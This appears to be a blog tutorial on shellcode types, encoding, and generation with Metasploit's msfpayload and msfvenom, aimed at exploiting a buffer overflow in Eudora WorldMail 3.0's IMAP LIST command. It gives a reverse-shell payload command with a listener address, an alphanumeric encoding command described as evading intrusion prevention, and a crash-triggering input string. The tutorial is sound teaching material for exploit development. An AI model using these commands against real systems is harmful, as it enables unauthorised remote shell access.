This post is the third of the Over The Flow series. In this post I am going to explain what is a shellcode and what are the types of shellcodes. In this post I am also going to refer to the types of the shellcode that I will be injecting to our vulnerable application (if you don't know what the vulnerable application is, have a look to my previous posts). But first I am going to do some research on what a shellcode means as based on Computer Security context.
What is a Shellcode
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode are insufficient. However, attempts at replacing the term have not gained wide acceptance.
More specifically a shellcode can be seen as a list of instructions that have been developed in a manner that allows us to inject it in an application during runtime.Injecting shellcode in an application can be done trough many different security holes of which buffer overflows are the most popular ones.
Origin of the term Shellcode
The shellcode is the code of the shell, meaning a code that provides you with a shell. A shell is a software that provides an interface for users of an operating system which provides access to the services of a kernel. However, the term is also applied very loosely to applications and may include any software that is "built around" a particular component, such as web browsers and email clients that are "shells" for HTML rendering engines. The name shell originates from shells being an outer layer of interface between the user and the internals of the operating system (the kernel).
Operating system shells generally fall into one of two categories: command-line and graphical. Command-line shells provide a command-line interface (CLI) to the operating system, while graphical shells provide a graphical user interface (GUI). In either category the primary purpose of the shell is to invoke or "launch" another program; however, shells frequently have additional capabilities such as viewing the contents of directories. More specifically for our post shell means an interactive command prompt with the operating system.
Type of Shellcode
A shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).
Local shellcode is used by an attacker who has limited access to a machine but can exploit a vulnerability, for example a buffer overflow, in a higher-privileged process on that machine. If successfully executed, the shellcode will provide the attacker access to the machine with the same higher privileges as the targeted process.
Remote shellcode is used when an attacker wants to target a vulnerable process running on another machine on a local network or intra-net. If successfully executed, the shellcode can provide the attacker access to the target machine across the network. Remote shellcodes normally use standard TCP/IP socket connections to allow the attacker access to the shell on the target machine. Such shellcode can be categorized based on how this connection is set up: if the shellcode can establish this connection, it is called a "reverse shell" or a connect-back shellcode because the shellcode connects back to the attacker's machine.
On the other hand, if the attacker needs to create the connection, the shellcode is called a bindshell because the shellcode binds to a certain port on which the attacker can connect to control it. A third type, much less common, is socket-reuse shellcode. This type of shellcode is sometimes used when an exploit establishes a connection to the vulnerable process that is not closed before the shellcode is run. The shellcode can then re-use this connection to communicate with the attacker. Socket re-using shellcode is harder to create because the shellcode needs to find out which connection to re-use and the machine may have many connections open.
Download and execute types of Shellcodes
Download and execute is a type of remote shellcode that downloads and executes some form of malware on the target system. This type of shellcode does not spawn a shell, but rather instructs the machine to download a certain executable file off the network, save it to disk and execute it. A variation of this type of shellcode downloads and loads a library. Advantages of this technique are that the code can be smaller, that it does not require the shellcode to spawn a new process on the target system, and that the shellcode does not need code to clean up the targeted process as this can be done by the library loaded into the process.
When the amount of data that an attacker can inject into the target process is too limited to execute useful shellcode directly, it may be possible to execute it in stages. First, a small piece of shellcode (stage 1) is executed. This code then downloads a larger piece of shellcode (stage 2) into the process's memory and executes it.
This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process but cannot determine where in the process it will end up. Small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process's address space for the larger shellcode (the egg) and executes it.
Shellcode execution strategy
An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.
Why Shellcode encoding
Because most processes filter or restrict the data that can be injected, shellcode often needs to be written to allow for these restrictions. This includes making the code small, null-free or alphanumeric. Various solutions have been found to get around such restrictions, including:
- Design and implementation optimizations to decrease the size of the shellcode.
- Implementation modifications to get around limitations in the range of bytes used in the shellcode.
- Self-modifying code that modifies a number of the bytes of its own code before executing them to re-create bytes that are normally impossible to inject into the process.
There are tons of repositories all around the Internet for shellcoding. Namely, the metasploit project seems to be the best. Writing an exploit can be difficult, what happens when all of the pre-written blocks of code cease to work? You need to write your own! Hopefully this tutorial will give you a good head start.
Finding your own Shellcode
Well believe it or not you do not have to use MSFPayload to get a Shellcode now you can gain access to all type of shellcode from shellcode-strom website just by clicking here. Shell-Storm.org is a development organization based on GNU/Linux systems that provide free projects and source codes. Of course in order to use this type of shellcode you might have to know little about assembly :(, but that is life with shellcoding right? A funny Shellcode is the beep Shellcode which you can find here, which obviously what it does is Beeping here is the relevant extract: Shellcode can be changed to work with any windows distribution by changing the address of Beep in kernel32.dll Addresses for SP1 and SP2.Another website to download Shellcodes is of course the exploit-db which you can find here. I should also remind you that I already generated a Shellcode using MSFPayload tool kit so I am not going to waste anymore time in Shellcodes from Internet.
Generating your own Shellcode using msfpayload
In order to generate your own shellcode you can use msfpayload utility (even though if you want to do it properly you would have to write your own shellcodes!!). So msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing an exploit.
This is a sample msfpayload command usage:
Note: This command option shows you the options for each shellcode you would like to generate.Default port is 4444, a nice port to start a pen-test.
As we can see from the output, we can configure three different options with this specific payload, if they are required, if they come with any default settings, and a short description:
- Default setting: process
- Default setting: 4444
- Not required
- No default settings
Note: The exit code is related to the type of the exploit. Some exploits might not work if you choose the wrong type of exit. For example a SEH exploit such as ours probably would have to exit using the SEH exit function. In any case you might have to brute force the vulnerability, which this might also crash the service, so it is not a good idea.
Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C (click to enlarge):
Generating your own Shellcode using msfvenom
The utility msfvenom is a combination of msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:
- One single tool
- Standardized command line options
- Increased speed
An example of the usage of msfvenom can be seen below:
Note: The command and resulting shellcode above generates a Windows bind shell with three iterations of the shikata_ga_nai encoder without any null bytes in our shellcode.
Note: You can also generate your shellcode from console after issuing a show payloads command and then typing generate. From the generate command you can do all stuff such as encoding and removing all bad characters.
Increasing Shellcode execution probability
There are cases where you need to obtain a pure alphanumeric shellcode because of character filtering in the exploited application. MSFpayload can generate alphanumeric shellcode easily through msfencode. Also bad characters can have a number of different effects in an exploit and you would also want to remove them. And at last encoding transformation types also might be a problem so unicoding shellcodes must something you should be able to do.
Alphanumeric and printable Shellcode
In certain circumstances, a target process will filter any byte from the injected shellcode that is not a printable or alphanumeric character. Under such circumstances, the range of instructions that can be used to write a shellcode becomes very limited. A solution to this problem was published by Rix in Phrack 57 in which he showed it was possible to turn any code into alphanumeric code. A technique often used is to create self-modifying code, because this allows the code to modify its own bytes to include bytes outside of the normally allowed range, thereby expanding the range of instructions it can use. Using this trick, a self-modifying decoder can be created that initially uses only bytes in the allowed range. The main code of the shellcode is encoded, also only using bytes in the allowed range. When the output shellcode is running, the decoder can modify its own code to be able to use any instruction it requires to function properly and then continues to decode the original shellcode. After decoding the shellcode the decoder transfers control to it, so it can be executed as normal. It has been shown that it is possible to create arbitrarily complex shellcode that looks like normal text in English.
msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/alpha_mixed
Note: This command removes converts your shellcode to alphanumeric. This can also be used to by pass host based IPS software or Network Based IPS devices.
Modern programs use Unicode strings to allow internationalization of text. Often, these programs will convert incoming ASCII strings to Unicode before processing them. Unicode strings encoded in UTF-16 use two bytes to encode each character (or four bytes for some special characters). When an ASCII string is transformed into UTF-16, a zero byte is inserted after each byte in the original string. Obscou proved in Phrack 61 that it is possible to write shellcode that can run successfully after this transformation. Programs that can automatically encode any shellcode into alphanumeric UTF-16-proof shellcode exist, based on the same principle of a small self-modifying decoder that decodes the original shellcode. You can find out about Unicode characters here.
Removing bad characters in your Shellcode
Bad characters can have a number of different effects in an exploit. Sometimes they get translated to one or more other characters, or they get removed from the string entirely, in which case you work out which characters are bad by examining the memory dump in the debugger, finding your buffer, and seeing which characters are missing or have changed. In other cases however, bad characters seem to completely change the structure of the buffer, and simple memory examination won't tell you which ones are missing.
The command to avoid this types of problems is:
msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c
Note: This command removes all bad characters such as \x00m \x0a and \xd (remember from previous posts that this characters were used for header injection attacks in Web Applications).
The INT 3 interrupt call
The INT instruction is an assembly language instruction for x86 processors that generates a software interrupt. It takes the interrupt number formatted as a byte value.When written in assembly language, the instruction is written like this:
Note: Where X is the software interrupt that should be generated.
The INT 3 instruction is defined for use by debuggers to temporarily replace an instruction in a running program, in order to set a breakpoint. Other INT instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long), for more information see SIGTRAP.
When writing exploits the opcode for INT 3 is used to test and make a functional our shellcode. The INT 3 software interrupt in hexadecimal is 0xCC. So for our example when we want to inject a shellcode we will inject software interrupts in the position of the possible shellcode and try to work our way through.
Shellcode injection methodology
So the method used to inject a shellcode into an application and run is:
- Go through the implementation details if the technology through RFC's (e.g. IMAP4 RFC) and identify possible implementation issues. For our exploit development using IMAP4 RFC helped us identify the bracket character bad handling.
- Fuzz the application in order to create an overflow and crush the vulnerable program and identify the proper attack vector, for Eudora Qualcomm WorldMail 3.0 it was the LIST command. In our application I used a large buffer of A's ending with the } character.
- Identify the size of the exact buffer size that crushes the vulnerable application if needed. Again for our exploit development example we found out that the IMAP4 sever crushes using this A*125+} or else with this Python representation string '\x41' * 125 + '\x7D' we also calculated the spaces to insert the shellcode, but this is shown in the next post.
- Use metasploit pattern_create and pattern_offset tools to identify the exact position of the EIP address. In our vulnerable program we managed to identify the position of the EIP and we overwrote with 4 C's.
- Inject the shellcode and debug the vulnerable application using INT3 software interrupts. Repeat the same process until you have a working shellcode. This part is used for proper positioning of the shell.
Note: See how linear is the process of injecting the shellcode.
The Shellcode for our vulnerable server
We want to exploit Eudora Qualcomm WorldMail 3.0 software and more specifically we want to exploit a buffer overflow in the LIST command as explained in previous posts (the Over The Flow Post Part 1). Now if you have a look at the exploit that we are trying to replicate you will understand that the shellcode used is a staged shellcode, also called a two part shellcode. This exploit can be found here , if you click at the link you will also find out that the first stage is not downloading the second part. The first stage of the shellcode is a 42 byte code that points to the second part that is the true shellcode that binds a shell to port 4444.Which means that when the first stage is executed it searches for the second stage and executes it.
So this is the first stage shellcode (directly taken from the exploit):
# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
# First Stage Shellcode
So this is the second stage shellcode (directly taken from the exploit):
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
# Second Stage Shellcode
In the next part I will finally injecting the shellcode. As you can already see things become more and more complicated.